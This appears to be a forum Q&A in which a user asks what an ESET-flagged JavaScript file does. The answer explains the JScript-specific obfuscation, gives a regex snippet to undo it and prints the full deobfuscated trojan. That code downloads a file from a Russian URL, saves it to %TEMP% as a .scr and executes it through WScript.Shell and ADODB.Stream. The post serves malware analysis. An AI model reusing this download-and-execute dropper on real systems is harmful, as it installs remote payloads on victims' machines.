What does this bit of javascript do? This was marked by ESET as trojan

走远了吗. Submitted on 2019-12-03 20:57:36

Interesting obfuscation, lots of use of the comma operator. Notice that

function String.prototype.e(a) {
    return this.charAt(a);
}

is syntactically invalid JavaScript, but works in (possibly only old versions of) Jscript (see here, page 69). Those .e() calls just get the first character of the respective string.

Removing the obfuscation using the snippet

code.replace(/\\u([0-9a-f]{4})/g, function(_, c) { return String.fromCharCode(parseInt(c, 16)); })
  .replace(/\((?:'[^']*',\s*)*'(.)[^']*'\.e\(\)\)/g, "'$1'")
  .replace(/'\s*\+\s*'/g, "")

this is what you will get (do not run this!):

autonomousRadio = eval('this');
autonomousRadio = autonomousRadio['ActiveXObject'];
skeletonArcade = 'Run';
phaseMemorial = new autonomousRadio('WScript.Shell');
tribuneApparatus = phaseMemorial['ExpandEnvironmentStrings']('%TEMP%/') + "XFxuhJaJ" + '.scr';
classificationHospital = new autonomousRadio('MSXML2.XMLHTTP');
classificationHospital['open']('GET', 'http://mondero.ru/system/logs/56y4g45gh45h', ((1 & 1) + (1 * 0)) == ((1 | 1) & (0 & 1)));
classificationHospital['send']();
while (classificationHospital['readystate'] < ((2 ^ 1) ^ (1 | 6))) {
    this['WScript']['Sleep'](((3384 / 36) + (5 + 1)));
}
commandOccupy = new autonomousRadio('ADODB.Stream');
try {
    commandOccupy['open']();
    commandOccupy['type'] = ((0 / 16) ^ (52 - 51));
    commandOccupy['write'](classificationHospital['ResponseBody']);
    commandOccupy['position'] = ((0 & 1) & (1 | 0));
    try {
        commandOccupy['saveToFile'](tribuneApparatus, ((2 ^ 0) | (0 + 0)));
        commandOccupy['close']();
        phaseMemorial[skeletonArcade](tribuneApparatus);
    } catch (arbiterApproximation) {};
} catch (arbiterApproximation) {};

Yes, this is clearly a trojan, downloading a .scr file from that Russian domain onto your computer.
